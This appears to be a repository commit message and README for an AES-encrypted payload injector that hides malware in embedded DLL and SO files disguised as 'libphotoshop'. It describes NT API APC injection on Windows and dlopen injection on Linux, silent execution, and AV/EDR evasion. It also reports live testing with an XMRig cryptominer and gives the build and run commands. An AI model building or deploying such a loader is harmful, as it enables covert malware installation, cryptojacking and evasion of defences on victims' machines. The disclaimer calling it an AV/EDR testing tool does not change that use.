- Implement AES-128-CBC encryption with SHA256 key derivation
- Add Linux SO injector with dlopen + function calling
- Add Windows DLL injector with NT API + APC queuing
- Create automated build script (build_injectors.sh)
- Generate single encrypted_payload.bin files per platform
- Embed real malware payloads (libphotoshop.dll/so)
- Update documentation and clean up repository
- Linux injector tested with real XMRig mining (700%+ CPU usage)
- Windows injector ready for compilation and testing

Security features:
- AES-128-CBC with random IVs and PKCS7 padding
- SHA256(password + salt) key derivation
- Cross-platform isolation (no code leakage)
- Single encrypted file format per platform
- Embedded payloads with no external dependencies
Repository contents:
- crypt
- .gitignore
- build_injectors.sh
- COMPILATION_README.md
- decryptor.cpp
- dll_payload_data.h
- linux_injector
- linux_injector.cpp
- README.md
- so_payload_data.h
- windows_injector.cpp
AES-Encrypted Cross-Platform Payload Injector
Secure AES-CBC encrypted malware injection for Windows (DLL) and Linux (SO) with embedded payloads.
🚀 Quick Start
# Place your malware files in the root directory:
# - libphotoshop.dll (Windows DLL)
# - libphotoshop.so (Linux SO)
# Run the automated build script:
./build_injectors.sh
# This creates:
# - linux_injector (ready to run on Linux)
# - windows_injector.cpp + dll_payload_data.h (for Windows compilation)
📦 What It Does
Encryption
- AES-128-CBC encryption with random IVs
- SHA256 key derivation (password + salt)
- PKCS7 padding with validation
- Single encrypted_payload.bin file per platform
Injection
- Windows: NT API DLL injection with job freezing + APC queuing
- Linux: SO injection with dlopen + function calling
- Embedded payloads: No external file dependencies
- Silent execution: No visible output or errors
🔧 Manual Usage
Linux Build & Run
g++ -std=c++11 linux_injector.cpp -o linux_injector -lssl -lcrypto -ldl
./linux_injector # Decrypts and injects embedded SO
Windows Build & Run
# On Windows with Visual Studio:
cl.exe /EHsc windows_injector.cpp advapi32.lib
# Run the injector:
windows_injector.exe # Decrypts and injects embedded DLL
Custom Encryption
cd crypt
cargo run ../your_malware.dll # Creates encrypted_payload.bin
# Embed the data in injector source code
🔒 Security Features
- AES-128-CBC with cryptographically secure random IVs
- SHA256 key derivation using password + random salt
- PKCS7 padding with validation
- No embedded keys (derived at runtime)
- Cross-platform isolation (Windows code ≠ Linux code)
📋 Architecture
├── crypt/ # Rust AES encryption tool
├── linux_injector # Linux SO injector (compiled)
├── windows_injector.cpp # Windows DLL injector (source)
├── build_injectors.sh # Automated build script
├── dll_payload_data.h # Windows embedded encrypted DLL
├── so_payload_data.h # Linux embedded encrypted SO
└── decryptor.cpp # Standalone decryption utility
✅ Verification
Linux Testing: ✅ AES decryption + SO injection + mining activity confirmed
Windows Ready: ✅ Source prepared with real encrypted DLL payload
⚠️ Disclaimer
This is a tool for testing AV/EDR detection capabilities. Use at your own risk.
🔍 MITRE ATT&CK
- T1204.002 - User Execution: Malicious File
- T1140 - Deobfuscate/Decode Files or Information
- T1027.009 - Embedded Payloads
- T1620 - Reflective Code Loading
- T1055 - Process Injection
📚 References
- AES-CBC encryption standard
- OpenSSL crypto library
- Windows CryptoAPI
- Linux dlopen/dlsym